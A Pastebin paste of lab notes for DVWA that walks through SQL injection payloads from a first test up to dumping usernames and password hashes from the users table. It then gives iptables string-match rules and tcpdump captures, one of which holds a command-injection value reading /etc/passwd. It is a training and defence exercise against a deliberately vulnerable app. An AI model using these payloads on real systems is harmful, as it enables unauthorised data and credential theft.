Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- =========================================================================
- DVWA
- =========================================================================
- 1.SQLi vs Manual Exploit
- https://mimmoo.wordpress.com/2011/06/19/dvwa-damn-vulnerable-web-app/
- https://websec.ca/kb/sql_injection
- =========================================================================
- 1.1.Test
- %' or '0'='0
- =========================================================================
- 1.2.Display Database Version
- %' or 0=0 union select null, version() #
- =========================================================================
- 1.3.Display Database Version
- %' or 0=0 union select null, version() #
- =========================================================================
- 1.4.Display Database User
- %' or 0=0 union select null, user() #
- =========================================================================
- 1.5.Display Database Name
- %' or 0=0 union select null, database() #
- =========================================================================
- 1.6.Display all tables in information_schema
- %' and 1=0 union select null, table_name from information_schema.tables #
- =========================================================================
- 1.7.Display all the user tables in information_schema
- %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
- =========================================================================
- 1.8.Display all the columns fields in the information_schema user table
- %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
- =========================================================================
- 1.9.Display all the columns field contents in the information_schema user table
- %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
- =======================================================================
- Iptables -nvL
- =======================================================================
- Blocked Web Attack Top 10 OWASP vs iptables vs tcpdump
- =======================================================================
- iptables -I INPUT -p tcp --dport 80 -m string --algo bm --string '%27' -j DROP
- -->block SQLi
- ->http://demo.nickname.net/demo/testpak/encode.pl(check string to filter ex::27==singlequote(‘)
- =====================================================================
- root@metasploitable:~# tcpdump -qns 0 -A port 80
- E..JP.@..............?.P...kOy. P...#...GET /dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit =====================================================================
- iptables -I INPUT -p tcp --dport 80 -m string --algo bm --string '%26' -j DROP
- ->Block CMDi
- ->http://demo.nickname.net/demo/testpak/encode.pl(check string to filter ex:%26==&
- =====================================================================
- root@metasploitable:~# tcpdump -qns 0 -A port 80
- ip=8.8.8.8%26cat+%2Fetc%2Fpasswd&submit=submit
- =====================================================================
- =====================================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement